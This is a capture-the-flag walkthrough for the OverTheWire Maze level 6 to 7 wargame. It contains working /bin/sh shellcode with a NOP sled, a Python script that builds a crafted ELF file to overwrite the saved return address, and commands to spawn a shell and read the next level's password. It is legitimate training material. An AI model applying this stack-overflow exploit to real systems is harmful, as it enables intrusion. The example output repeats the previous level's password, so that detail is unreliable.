OverTheWire Maze Level 6 → 7 tutorial!!

Login

Use the maze6 account from the previous level.

ssh maze6@maze.labs.overthewire.org -p <PORT>
# password: pohninieng

Binary for this challenge: /maze/maze7

Task

Abuse the unsafe buffer handling in Print_Shdrs() to overflow the stack and redirect execution to our shellcode in the environment.

A little bit of Theory

The program loads ELF headers and prints section headers:

• main reads the ELF header, then calls Print_Shdrs().
• Inside Print_Shdrs, there’s a local dummy buffer at ebp-60.
• Then comes this dangerous line:

read(fd, p, size);

Where p = &dummy. → If size > 60, the read overflows the stack frame, smashing saved EIP.

Key notes:

• By controlling size, we control how far we overwrite.
• Setting size = 0x44 (68) makes it overwrite saved EIP cleanly.
• Other parameters (num, shstrndx, etc.) don’t matter if we make them zero.
• We only need the loop to run once, so num = 0.

Step 1 — Prepare shellcode in the environment

Same trick as previous levels: store shellcode in $SC, padded with a NOP sled:

export SC=$(python - <<'PY'
print("\x90"*100 + 
      "\x31\xc0\x50\x68\x2f\x2f\x73\x68" +
      "\x68\x2f\x62\x69\x6e" +
      "\x89\xe3\x89\xc1\x89\xc2" +
      "\xb0\x0b\xcd\x80" +
      "\x31\xc0\x40\xcd\x80")
PY
)

Step 2 — Craft a malicious ELF-like file

We need the file to:

• Pass early ELF checks.
• Trigger size = 0x44.
• Place an overwrite for EIP pointing into $SC.

Minimal payload:

python - <<'PY' > hello
import sys
payload  = "\x00"*32                # padding
payload += "\x00\x00\x00\x00"       # offset values
payload += "\x00"*10
payload += "\x44\x00"               # size = 0x44
payload += "\x00\x00"
payload += "\x00\x00\x00\x00"
payload += "\x00"*10
payload += "\x0c\xdf\xff\xff"       # RET -> inside our env (adjust if needed)
sys.stdout.write(payload)
PY

Step 3 — Run the exploit

/maze/maze7 hello

If the return address correctly points into the NOP sled, execution slides into our shellcode, spawning a shell.

Step 4 — Grab the password

Inside the new shell:

id
cat /etc/maze_pass/maze7

Example output:

pohninieng

Why this works (tl;dr)

• read(fd, p, size) writes size bytes into a small stack buffer.
• With size = 0x44, we overwrite saved EIP.
• We set EIP to point into our $SC NOP sled → shellcode runs.
• From there, we spawn /bin/sh and read the next password.

Troubleshooting tips

• If it crashes without shell: → Check that your return address (0xffffdf0c style) really points inside $SC. Use getenv("SC") in gdb.
• If the loop runs too many times: → Ensure num = 0 in the crafted file.
• If nothing happens: → Verify NX is off for /maze/maze7 (checksec). Otherwise, need ret2libc.

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨